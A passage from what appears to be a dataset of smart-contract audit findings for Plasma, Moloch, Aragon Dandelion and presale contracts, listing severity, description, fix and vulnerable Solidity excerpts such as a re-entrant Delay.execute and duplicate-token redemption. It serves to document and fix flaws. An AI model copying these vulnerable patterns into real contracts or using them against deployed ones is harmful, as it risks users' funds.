self.framework.blocks(utxoPos.blockNum());\\n```\\n\\nPaymentPiggybackInFlightExit.enqueue:\\n```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n\\nTxFinalizationVerifier.checkInclusionProof:\\n```\\n(bytes32 root,) = data.framework.blocks(data.txPos.blockNum());\\n```\\nчAlthough none of these examples seem exploitable, adding existence checks makes it easier to reason about the code. Each query to `PlasmaFramework.blocks` should be followed with a check that the returned value is nonzero.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/463чч```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n -BondSize - effectiveUpdateTime should be uint64чlowчIn BondSize, the mechanism to update the size of the bond has a grace period after which the new bond size becomes active.\\nWhen updating the bond size, the time is casted as a `uint64` and saved in a `uint128` variable.\\n```\\nuint128 effectiveUpdateTime;\\n```\\n\\n```\\nuint64 constant public WAITING\\_PERIOD = 2 days;\\n```\\n\\n```\\nself.effectiveUpdateTime = uint64(now) + WAITING\\_PERIOD;\\n```\\n\\nThere's no need to use a `uint128` to save the time if it never will take up that much space.чChange the type of the `effectiveUpdateTime` to `uint64`.\\n```\\n- uint128 effectiveUpdateTime;\\n+ uint64 effectiveUpdateTime;\\n```\\nчч```\\nuint128 effectiveUpdateTime;\\n```\\n -PaymentExitGame contains several redundant plasmaFramework declarationsчlowч`PaymentExitGame` inherits from both `PaymentInFlightExitRouter` and `PaymentStandardExitRouter`. All three contracts declare and initialize their own `PlasmaFramework` variable. This pattern can be misleading, and may lead to subtle issues in future versions of the code.\\n`PaymentExitGame` declaration:\\n```\\nPlasmaFramework private plasmaFramework;\\n```\\n\\n`PaymentInFlightExitRouter` declaration:\\n```\\nPlasmaFramework private framework;\\n```\\n\\n`PaymentStandardExitRouter` declaration:\\n```\\nPlasmaFramework private framework;\\n```\\n\\nEach variable is initialized in the corresponding file's constructor.чIntroduce an inherited contract common to `PaymentStandardExitRouter` and `PaymentInFlightExitRouter` with the `PlasmaFramework` variable. Make the variable internal so it is visible to inheriting contracts.чч```\\nPlasmaFramework private plasmaFramework;\\n```\\n -Creating proposal is not trustless in Pull PatternчhighчUsually, if someone submits a proposal and transfers some amount of tribute tokens, these tokens are transferred back if the proposal is rejected. But if the proposal is not processed before the emergency processing, these tokens will not be transferred back to the proposer. This might happen if a tribute token or a deposit token transfers are blocked.\\n```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n \"failing vote token transfer failed\"\\n );\\n```\\n\\nTokens are not completely lost in that case, they now belong to the LAO shareholders and they might try to return that money back. But that requires a lot of coordination and time and everyone who ragequits during that time will take a part of that tokens with them.чResolution\\nthis issue no longer exists in the Pull Pattern update, due to the fact that emergency processing and in function ERC20 transfers are removed.\\nPull pattern for token transfers would solve the issue.чч```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n \"failing vote token transfer failed\"\\n );\\n```\\n -Emergency processing can be blocked in Pull PatternчhighчThe main reason for the emergency processing mechanism is that there is a chance that some token transfers might be blocked. For example, a sender or a receiver is in the USDC blacklist. Emergency processing saves from this problem by not transferring tribute token back to the user (if there is some) and rejecting the proposal.\\n```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n \"failing vote token transfer failed\"\\n );\\n```\\n\\nThe problem is that there is still a deposit transfer back to the sponsor and it could be potentially blocked too. If that happens, proposal can't be processed and the LAO is blocked.чImplementing pull pattern for all token withdrawals would solve the problem. The alternative solution would be to also keep the deposit tokens in the LAO, but that makes sponsoring the proposal more risky for the sponsor.чч```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n \"failing vote token transfer failed\"\\n );\\n```\\n -Token Overflow might result in system halt or loss of fundsчhighчIf a token overflows, some functionality such as `processProposal`, `cancelProposal` will break due to safeMath reverts. The overflow could happen because the supply of the token was artificially inflated to oblivion.\\nThis issue was pointed out by Heiko Fisch in Telegram chat.\\nAny function using `internalTransfer()` can result in an overflow:\\n```\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256) {\\n return x >= y ? x : y;\\n}\\n```\\nчWe recommend to allow overflow for broken or malicious tokens. This is to prevent system halt or loss of funds. It should be noted that in case an overflow occurs, the balance of the token will be incorrect for all token holders in the system.\\n`rageKick`, `rageQuit` were fixed by not using safeMath within the function code, however this fix is risky and not recommended, as there are other overflows in other functions that might still result in system halt or loss of funds.\\nOne suggestion is having a function named `unsafeInternalTransfer()` which does not use safeMath for the cases that overflow should be allowed. This mainly adds better readability to the code.\\nIt is still a risky fix and a better solution should be planned.чч```\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256) {\\n return x >= y ? x : y;\\n}\\n```\\n -Whitelisted tokens limitчhighч`_ragequit` function is iterating over all whitelisted tokens:\\n```\\nfor (uint256 i = 0; i < tokens.length; i++) {\\n uint256 amountToRagequit = fairShare(userTokenBalances[GUILD][tokens[i]], sharesAndLootToBurn, initialTotalSharesAndLoot);\\n // deliberately not using safemath here to keep overflows from preventing the function execution (which would break ragekicks)\\n // if a token overflows, it is because the supply was artificially inflated to oblivion, so we probably don't care about it anyways\\n userTokenBalances[GUILD][tokens[i]] -= amountToRagequit;\\n userTokenBalances[memberAddress][tokens[i]] += amountToRagequit;\\n}\\n```\\n\\nIf the number of tokens is too big, a transaction can run out of gas and all funds will be blocked forever. Ballpark estimation of this number is around 300 tokens based on the current OpCode gas costs and the block gas limit.чA simple solution would be just limiting the number of whitelisted tokens.\\nIf the intention is to invest in many new tokens over time, and it's not an option to limit the number of whitelisted tokens, it's possible to add a function that removes tokens from the whitelist. For example, it's possible to add a new type of proposals, that is used to vote on token removal if the balance of this token is zero. Before voting for that, shareholders should sell all the balance of that token.чч```\\nfor (uint256 i = 0; i < tokens.length; i++) {\\n uint256 amountToRagequit = fairShare(userTokenBalances[GUILD][tokens[i]], sharesAndLootToBurn, initialTotalSharesAndLoot);\\n // deliberately not using safemath here to keep overflows from preventing the function execution (which would break ragekicks)\\n // if a token overflows, it is because the supply was artificially inflated to oblivion, so we probably don't care about it anyways\\n userTokenBalances[GUILD][tokens[i]] -= amountToRagequit;\\n userTokenBalances[memberAddress][tokens[i]] += amountToRagequit;\\n}\\n```\\n -Whitelist proposal duplicate Won't FixчlowчEvery time when a whitelist proposal is sponsored, it's checked that there is no other sponsored whitelist proposal with the same token. This is done in order to avoid proposal duplicates.\\n```\\n// whitelist proposal\\nif (proposal.flags[4]) {\\n require(!tokenWhitelist[address(proposal.tributeToken)], \"cannot already have whitelisted the token\");\\n require(!proposedToWhitelist[address(proposal.tributeToken)], 'already proposed to whitelist');\\n proposedToWhitelist[address(proposal.tributeToken)] = true;\\n```\\n\\nThe issue is that even though you can't sponsor a duplicate proposal, you can still submit a new proposal with the same token.чCheck that there is currently no sponsored proposal with the same token on proposal submission.чч```\\n// whitelist proposal\\nif (proposal.flags[4]) {\\n require(!tokenWhitelist[address(proposal.tributeToken)], \"cannot already have whitelisted the token\");\\n require(!proposedToWhitelist[address(proposal.tributeToken)], 'already proposed to whitelist');\\n proposedToWhitelist[address(proposal.tributeToken)] = true;\\n```\\n -Moloch - bool[6] flags can be changed to a dedicated structure Won't FixчlowчThe Moloch contract uses a structure that includes an array of bools to store a few flags about the proposal:\\n```\\nbool[6] flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n\\nThis makes reasoning about the correctness of the code a bit complicated because one needs to remember what each item in the flag list stands for. The make the reader's life simpler a dedicated structure can be created that incorporates all of the required flags.\\n```\\n bool[6] memory flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\nчBased on the provided examples change the `bool[6] flags` to the proposed examples.\\nFlags as bool array with enum (proposed)\\nThis second contract implements the `flags` as a defined structure with each named element representing a specific flag. This method makes clear which flag is accessed because they are referred to by the name, not by the index.\\nThis third contract has the least amount of changes to the code and uses an enum structure to handle the index.\\n```\\npragma solidity 0.5.15;\\n\\ncontract FlagsEnum {\\n struct Proposal {\\n address applicant;\\n uint value;\\n bool[3] flags; // [sponsored, processed, kicked]\\n }\\n \\n enum ProposalFlags {\\n SPONSORED,\\n PROCESSED,\\n KICKED\\n }\\n \\n uint proposalCount;\\n \\n mapping(uint256 => Proposal) public proposals;\\n \\n function addProposal(uint \\_value, bool \\_sponsored, bool \\_processed, bool \\_kicked) public returns (uint) {\\n Proposal memory proposal = Proposal({\\n applicant: msg.sender,\\n value: \\_value,\\n flags: [\\_sponsored, \\_processed, \\_kicked]\\n });\\n \\n proposals[proposalCount] = proposal;\\n proposalCount += 1;\\n \\n return (proposalCount);\\n }\\n \\n function getProposal(uint \\_proposalId) public view returns (address, uint, bool, bool, bool) {\\n return (\\n proposals[\\_proposalId].applicant,\\n proposals[\\_proposalId].value,\\n proposals[\\_proposalId].flags[uint(ProposalFlags.SPONSORED)],\\n proposals[\\_proposalId].flags[uint(ProposalFlags.PROCESSED)],\\n proposals[\\_proposalId].flags[uint(ProposalFlags.KICKED)]\\n );\\n }\\n}\\n```\\nчч```\\nbool[6] flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n -Passing duplicate tokens to Redemptions and TokenRequest may have unintended consequencesчmediumчBoth `Redemptions` and `TokenRequest` are initialized with a list of acceptable tokens to use with each app. For `Redemptions`, the list of tokens corresponds to an organization's treasury assets. For `TokenRequest`, the list of tokens corresponds to tokens accepted for payment to join an organization. Neither contract makes a uniqueness check on input tokens during initialization, which can lead to unintended behavior.\\nIn `Redemptions`, each of an organization's assets are redeemed according to the sender's proportional ownership in the org. The redemption process iterates over the `redeemableTokens` list, paying out the sender their proportion of each token listed:\\n```\\nfor (uint256 i = 0; i < redeemableTokens.length; i++) {\\n vaultTokenBalance = vault.balance(redeemableTokens[i]);\\n\\n redemptionAmount = \\_burnableAmount.mul(vaultTokenBalance).div(burnableTokenTotalSupply);\\n totalRedemptionAmount = totalRedemptionAmount.add(redemptionAmount);\\n\\n if (redemptionAmount > 0) {\\n vault.transfer(redeemableTokens[i], msg.sender, redemptionAmount);\\n }\\n}\\n```\\n\\nIf a token address is included more than once, the sender will be paid out more than once, potentially earning many times more than their proportional share of the token.\\nIn `TokenRequest`, this behavior does not allow for any significant deviation from expected behavior. It was included because the initialization process is similar to that of `Redemptions`.чResolution\\nThis was addressed in Redemptions commit 2b0034206a5b9cdf239da7a51900e89d9931554f by checking `redeemableTokenAdded[token] == false` for each subsequent token added during initialization. Note that ordering is not enforced.\\nAdditionally, the issue in `TokenRequest` was addressed in commit eb4181961093439f142f2e74eb706b7f501eb5c0 by requiring that each subsequent token added during initialization has a value strictly greater than the previous token added.\\nDuring initialization in both apps, check that input token addresses are unique. One simple method is to require that token addresses are submitted in ascending order, and that each subsequent address added is greater than the one before.чч```\\nfor (uint256 i = 0; i < redeemableTokens.length; i++) {\\n vaultTokenBalance = vault.balance(redeemableTokens[i]);\\n\\n redemptionAmount = \\_burnableAmount.mul(vaultTokenBalance).div(burnableTokenTotalSupply);\\n totalRedemptionAmount = totalRedemptionAmount.add(redemptionAmount);\\n\\n if (redemptionAmount > 0) {\\n vault.transfer(redeemableTokens[i], msg.sender, redemptionAmount);\\n }\\n}\\n```\\n -The Delay app allows scripts to be paused even after execution time has elapsedчmediumчThe `Delay` app is used to configure a delay between when an evm script is created and when it is executed. The entry point for this process is `Delay.delayExecution`, which stores the input script with a future execution date:\\n```\\nfunction \\_delayExecution(bytes \\_evmCallScript) internal returns (uint256) {\\n uint256 delayedScriptIndex = delayedScriptsNewIndex;\\n delayedScriptsNewIndex++;\\n\\n delayedScripts[delayedScriptIndex] = DelayedScript(getTimestamp64().add(executionDelay), 0, \\_evmCallScript);\\n\\n emit DelayedScriptStored(delayedScriptIndex);\\n\\n return delayedScriptIndex;\\n}\\n```\\n\\nAn auxiliary capability of the `Delay` app is the ability to “pause” the delayed script, which sets the script's `pausedAt` value to the current block timestamp:\\n```\\nfunction pauseExecution(uint256 \\_delayedScriptId) external auth(PAUSE\\_EXECUTION\\_ROLE) {\\n require(!\\_isExecutionPaused(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_PAUSE);\\n delayedScripts[\\_delayedScriptId].pausedAt = getTimestamp64();\\n\\n emit ExecutionPaused(\\_delayedScriptId);\\n}\\n```\\n\\nA paused script cannot be executed until `resumeExecution` is called, which extends the script's `executionTime` by the amount of time paused. Essentially, the delay itself is paused:\\n```\\nfunction resumeExecution(uint256 \\_delayedScriptId) external auth(RESUME\\_EXECUTION\\_ROLE) {\\n require(\\_isExecutionPaused(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_RESUME);\\n DelayedScript storage delayedScript = delayedScripts[\\_delayedScriptId];\\n\\n uint64 timePaused = getTimestamp64().sub(delayedScript.pausedAt);\\n delayedScript.executionTime = delayedScript.executionTime.add(timePaused);\\n delayedScript.pausedAt = 0;\\n\\n emit ExecutionResumed(\\_delayedScriptId);\\n}\\n```\\n\\nA delayed script whose execution time has passed and is not currently paused should be able to be executed via the `execute` function. However, the `pauseExecution` function still allows the aforementioned script to be paused, halting execution.чAdd a check to `pauseExecution` to ensure that execution is not paused if the script's execution delay has already transpired.чч```\\nfunction \\_delayExecution(bytes \\_evmCallScript) internal returns (uint256) {\\n uint256 delayedScriptIndex = delayedScriptsNewIndex;\\n delayedScriptsNewIndex++;\\n\\n delayedScripts[delayedScriptIndex] = DelayedScript(getTimestamp64().add(executionDelay), 0, \\_evmCallScript);\\n\\n emit DelayedScriptStored(delayedScriptIndex);\\n\\n return delayedScriptIndex;\\n}\\n```\\n -Misleading intentional misconfiguration possible through misuse of newToken and newBaseInstanceчmediumчThe instantiation process for a Dandelion organization requires two separate external calls to `DandelionOrg`. There are two primary functions: `installDandelionApps`, and `newTokenAndBaseInstance`.\\n`installDandelionApps` relies on cached results from prior calls to `newTokenAndBaseInstance` and completes the initialization step for a Dandelion org.\\n`newTokenAndBaseInstance` is a wrapper around two publicly accessible functions: `newToken` and `newBaseInstance`. Called together, the functions:\\nDeploy a new `MiniMeToken` used to represent shares in an organization, and cache the address of the created token:\\n```\\n/\\*\\*\\n\\* @dev Create a new MiniMe token and save it for the user\\n\\* @param \\_name String with the name for the token used by share holders in the organization\\n\\* @param \\_symbol String with the symbol for the token used by share holders in the organization\\n\\*/\\nfunction newToken(string memory \\_name, string memory \\_symbol) public returns (MiniMeToken) {\\n MiniMeToken token = \\_createToken(\\_name, \\_symbol, TOKEN\\_DECIMALS);\\n \\_saveToken(token);\\n return token;\\n}\\n```\\n\\nCreate a new dao instance using Aragon's `BaseTemplate` contract:\\n```\\n/\\*\\*\\n\\* @dev Deploy a Dandelion Org DAO using a previously saved MiniMe token\\n\\* @param \\_id String with the name for org, will assign `[id].aragonid.eth`\\n\\* @param \\_holders Array of token holder addresses\\n\\* @param \\_stakes Array of token stakes for holders (token has 18 decimals, multiply token amount `\\* 10^18`)\\n\\* @param \\_useAgentAsVault Boolean to tell whether to use an Agent app as a more advanced form of Vault app\\n\\*/\\nfunction newBaseInstance(\\n string memory \\_id,\\n address[] memory \\_holders,\\n uint256[] memory \\_stakes,\\n uint64 \\_financePeriod,\\n bool \\_useAgentAsVault\\n)\\n public\\n{\\n \\_validateId(\\_id);\\n \\_ensureBaseSettings(\\_holders, \\_stakes);\\n\\n (Kernel dao, ACL acl) = \\_createDAO();\\n \\_setupBaseApps(dao, acl, \\_holders, \\_stakes, \\_financePeriod, \\_useAgentAsVault);\\n}\\n```\\n\\nSet up prepackaged Aragon apps, like `Vault`, `TokenManager`, and Finance:\\n```\\nfunction \\_setupBaseApps(\\n Kernel \\_dao,\\n ACL \\_acl,\\n address[] memory \\_holders,\\n uint256[] memory \\_stakes,\\n uint64 \\_financePeriod,\\n bool \\_useAgentAsVault\\n)\\n internal\\n{\\n MiniMeToken token = \\_getToken();\\n Vault agentOrVault = \\_useAgentAsVault ? \\_installDefaultAgentApp(\\_dao) : \\_installVaultApp(\\_dao);\\n TokenManager tokenManager = \\_installTokenManagerApp(\\_dao, token, TOKEN\\_TRANSFERABLE, TOKEN\\_MAX\\_PER\\_ACCOUNT);\\n Finance finance = \\_installFinanceApp(\\_dao, agentOrVault, \\_financePeriod == 0 ? DEFAULT\\_FINANCE\\_PERIOD : \\_financePeriod);\\n\\n \\_mintTokens(\\_acl, tokenManager, \\_holders, \\_stakes);\\n \\_saveBaseApps(\\_dao, finance, tokenManager, agentOrVault);\\n \\_saveAgentAsVault(\\_dao, \\_useAgentAsVault);\\n\\n}\\n```\\n\\nNote that `newToken` and `newBaseInstance` can be called separately. The token created in `newToken` is cached in `_saveToken`, which overwrites any previously-cached value:\\n```\\nfunction \\_saveToken(MiniMeToken \\_token) internal {\\n DeployedContracts storage senderDeployedContracts = deployedContracts[msg.sender];\\n\\n senderDeployedContracts.token = address(\\_token);\\n}\\n```\\n\\nCached tokens are retrieved in _getToken:\\n```\\nfunction \\_getToken() internal returns (MiniMeToken) {\\n DeployedContracts storage senderDeployedContracts = deployedContracts[msg.sender];\\n require(senderDeployedContracts.token != address(0), ERROR\\_MISSING\\_TOKEN\\_CONTRACT);\\n\\n MiniMeToken token = MiniMeToken(senderDeployedContracts.token);\\n return token;\\n}\\n```\\n\\nBy exploiting the overwriteable caching mechanism, it is possible to intentionally misconfigure Dandelion orgs.\\n`installDandelionApps` uses `_getToken` to associate a token with the `DandelionVoting` app. The value returned from `_getToken` depends on the sender's previous call to `newToken`, which overwrites any previously-cached value. The steps for intentional misconfiguration are as follows:\\nSender calls `newTokenAndBaseInstance`, creating token `m0` and DAO `A`.\\nThe `TokenManager` app in `A` is automatically configured to be the controller of `m0`.\\n`m0` is cached using `_saveToken`.\\nDAO `A` apps are cached for future use using `_saveBaseApps` and `_saveAgentAsVault`.\\nSender calls `newToken`, creating token `m1`, and overwriting the cache of `m0`.\\nFuture calls to `_getToken` will retrieve `m1`.\\nThe `DandelionOrg` contract is the controller of `m1`.\\nSender calls `installDandelionApps`, which installs Dandelion apps in DAO `A`\\nThe `DandelionVoting` app is configured to use the current cached token, `m1`, rather than the token associated with `A.TokenManager`, `m0`\\nFurther calls to `newBaseInstance` and `installDandelionApps` create DAO `B`, populate it with Dandelion apps, and assign `B.TokenManager` as the controller of the earlier `DandelionVoting` app token, `m0`.\\nMany different misconfigurations are possible, and some may be underhandedly abusable.чMake `newToken` and `newBaseInstance` internal so they are only callable via `newTokenAndBaseInstance`.чч```\\n/\\*\\*\\n\\* @dev Create a new MiniMe token and save it for the user\\n\\* @param \\_name String with the name for the token used by share holders in the organization\\n\\* @param \\_symbol String with the symbol for the token used by share holders in the organization\\n\\*/\\nfunction newToken(string memory \\_name, string memory \\_symbol) public returns (MiniMeToken) {\\n MiniMeToken token = \\_createToken(\\_name, \\_symbol, TOKEN\\_DECIMALS);\\n \\_saveToken(token);\\n return token;\\n}\\n```\\n -Delay.execute can re-enter and re-execute the same script twiceчlowч`Delay.execute` does not follow the “checks-effects-interactions” pattern, and deletes a delayed script only after the script is run. Because the script being run executes arbitrary external calls, a script can be created that re-enters `Delay` and executes itself multiple times before being deleted:\\n```\\n/\\*\\*\\n\\* @notice Execute the script with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script to execute\\n\\*/\\nfunction execute(uint256 \\_delayedScriptId) external {\\n require(canExecute(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_EXECUTE);\\n runScript(delayedScripts[\\_delayedScriptId].evmCallScript, new bytes(0), new address[](0));\\n\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutedScript(\\_delayedScriptId);\\n}\\n```\\nчAdd the `Delay` contract address to the `runScript` blacklist, or delete the delayed script from storage before it is run.чч```\\n/\\*\\*\\n\\* @notice Execute the script with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script to execute\\n\\*/\\nfunction execute(uint256 \\_delayedScriptId) external {\\n require(canExecute(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_EXECUTE);\\n runScript(delayedScripts[\\_delayedScriptId].evmCallScript, new bytes(0), new address[](0));\\n\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutedScript(\\_delayedScriptId);\\n}\\n```\\n -Delay.cancelExecution should revert on a non-existent script idчlowч`cancelExecution` makes no existence check on the passed-in script ID, clearing its storage slot and emitting an event:\\n```\\n/\\*\\*\\n\\* @notice Cancel script execution with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script execution to cancel\\n\\*/\\nfunction cancelExecution(uint256 \\_delayedScriptId) external auth(CANCEL\\_EXECUTION\\_ROLE) {\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutionCancelled(\\_delayedScriptId);\\n}\\n```\\nчAdd a check that the passed-in script exists.чч```\\n/\\*\\*\\n\\* @notice Cancel script execution with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script execution to cancel\\n\\*/\\nfunction cancelExecution(uint256 \\_delayedScriptId) external auth(CANCEL\\_EXECUTION\\_ROLE) {\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutionCancelled(\\_delayedScriptId);\\n}\\n```\\n -ID validation check missing for installDandelionAppsчlowч`DandelionOrg` allows users to kickstart an Aragon organization by using a dao template. There are two primary functions to instantiate an org: `newTokenAndBaseInstance`, and `installDandelionApps`. Both functions accept a parameter, `string _id`, meant to represent an ENS subdomain that will be assigned to the new org during the instantiation process. The two functions are called independently, but depend on each other.\\nIn `newTokenAndBaseInstance`, a sanity check is performed on the `_id` parameter, which ensures the `_id` length is nonzero:\\n```\\n\\_validateId(\\_id);\\n```\\n\\nNote that the value of `_id` is otherwise unused in `newTokenAndBaseInstance`.\\nIn `installDandelionApps`, this check is missing. The check is only important in this function, since it is in `installDandelionApps` that the ENS subdomain registration is actually performed.чUse `_validateId` in `installDandelionApps` rather than `newTokenAndBaseInstance`. Since the `_id` parameter is otherwise unused in `newTokenAndBaseInstance`, it can be removed.\\nAlternatively, the value of the submitted `_id` could be cached between calls and validated in `newTokenAndBaseInstance`, similarly to `newToken`.чч```\\n\\_validateId(\\_id);\\n```\\n -EOPBCTemplate - permission documentation inconsistenciesчhighчUndocumented\\nThe template documentation provides an overview of the permissions set with the template. The following permissions are set by the template contract but are not documented in the accompanied `fundraising/templates/externally_owned_presale_bonding_curve/README.md`.\\nTokenManager\\n```\\n\\_createPermissions(\\_acl, grantees, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.MINT\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_fundraisingApps.marketMaker, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.BURN\\_ROLE(), \\_owner);\\n```\\n\\ncode/fundraising/templates/externally_owned_presale_bonding_curve/eopbc.yaml:L33-L44\\n```\\n- app: anj-token-manager\\n role: MINT\\_ROLE\\n grantee: market-maker\\n manager: owner\\n- app: anj-token-manager\\n role: MINT\\_ROLE\\n grantee: presale\\n manager: owner\\n- app: anj-token-manager\\n role: BURN\\_ROLE\\n grantee: market-maker\\n manager: owner\\n```\\n\\nInconsistent\\nThe following permissions are set by the template but are inconsistent to the outline in the documentation:\\nController\\n`owner` has the following permissions even though they are documented as not being set https://github.com/ConsenSys/aragonone-presale-audit-2019-11/blob/9ddae8c7fde9dea3af3982b965a441239d81f370/code/fundraising/templates/externally_owned_presale_bonding_curve/README.md#controller.\\n```\\n| App | Permission | Grantee | Manager |\\n| ---------- | ------------------------------------- | ------- | ------- |\\n| Controller | UPDATE_BENEFICIARY | NULL | NULL |\\n| Controller | UPDATE_FEES | NULL | NULL |\\n| Controller | ADD_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | REMOVE_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | UPDATE_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | UPDATE_MAXIMUM_TAP_RATE_INCREASE_PCT | NULL | NULL |\\n| Controller | UPDATE_MAXIMUM_TAP_FLOOR_DECREASE_PCT | NULL | NULL |\\n| Controller | ADD_TOKEN_TAP | NULL | NULL |\\n| Controller | UPDATE_TOKEN_TAP | NULL | NULL |\\n| Controller | OPEN_PRESALE | Owner | Owner |\\n| Controller | OPEN_TRADING | Presale | Owner |\\n| Controller | CONTRIBUTE | Any | Owner |\\n| Controller | OPEN_BUY_ORDER | Any | Owner |\\n| Controller | OPEN_SELL_ORDER | Any | Owner |\\n| Controller | WITHDRAW | NULL | NULL |\\n```\\n\\n```\\n\\_acl.createPermission(\\_owner, \\_fundraisingApps.controller, \\_fundraisingApps.controller.UPDATE\\_BENEFICIARY\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_owner, \\_fundraisingApps.controller, \\_fundraisingApps.controller.UPDATE\\_FEES\\_ROLE(), \\_owner);\\n```\\nчResolution\\nFixed with aragonone/[email protected]bafe100 by adding the undocumented and deviating permissions to the documentation.\\nFor transparency, all permissions set-up by the template must be documented.чч```\\n\\_createPermissions(\\_acl, grantees, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.MINT\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_fundraisingApps.marketMaker, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.BURN\\_ROLE(), \\_owner);\\n```\\n -EOPBCTemplate - AppId of BalanceRedirectPresale should be different from AragonBlack/Presale namehash to avoid collisionsчhighчThe template references the new presale contract with `apmNamehash` `0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5`. However, this namehash is already used by the aragonBlack/Presale contract. To avoid confusion and collision a unique `apmNamehash` should be used for this variant of the contract.\\nNote that the contract that is referenced from an `apmNamehash` is controlled by the `ENS` resolver that is configured when deploying the template contract. Using the same namehash for both variants of the contract does not allow a single registry to simultaneously provide both variants of the contract and might lead to confusion as to which application is actually deployed. This also raises the issue that the `ENS` registry must be verified before actually using the contract as a malicious registry could force the template to deploy potentially malicious applications.\\naragonOne/Fundraising:\\n```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n\\naragonBlack/Fundraising:\\n```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n\\n`bytes32 private constant PRESALE_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;`чCreate a new `apmNamehash` for `BalanceRedirectPresale`.чч```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n -BalanceRedirectPresale - Presale can be extended indefinitely Won't FixчhighчThe `OPEN_ROLE` can indefinitely extend the Presale even after users contributed funds to it by adjusting the presale period. The period might be further manipulated to avoid that token trading in the MarketMaker is opened.\\n```\\nfunction setPeriod(uint64 \\_period) external auth(OPEN\\_ROLE) {\\n \\_setPeriod(\\_period);\\n}\\n```\\n\\n```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\nчDo not allow to extend the presale after funds have been contributed to it or only allow period adjustments in `State.PENDING`.чч```\\nfunction setPeriod(uint64 \\_period) external auth(OPEN\\_ROLE) {\\n \\_setPeriod(\\_period);\\n}\\n```\\n -BalanceRedirectPresale - setPeriod uint64 overflow in validation checkчmediumч`setPeriod()` allows setting an arbitrary Presale starting date. The method can be called by an entity with the `OPEN_ROLE` permission. Providing a large enough value for `uint64 _period` can overflow the second input validation check. The result is unwanted behaviour where for relatively large values of `period` the require might fail because the overflow `openDate + _period` is less than or equal the current timestamp (getTimestamp64()) but if high enough it still might succeed because `openDate + _period` is higher than the current timestamp. The overflow has no effect on the presale end as it is calculated against `_timeSinceOpen`.\\n```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\n\\nчResolution\\nFixed with aragonone/[email protected]bafe100 by performing the addition using `SafeMath`.\\nUse `SafeMath` which is already imported to protect from overflow scenarios.чч```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\n -EOPBCTemplate - misleading method names _cacheFundraisingApps and _cacheFundraisingParamsчlowчThe methods `_cacheFundraisingApps` and `_cacheFundraisingParams` suggest that parameters are cached as state variables in the contract similar to the multi-step deployment contract used for AragonBlack/Fundraising. However, the methods are just returning memory structs.\\n```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n 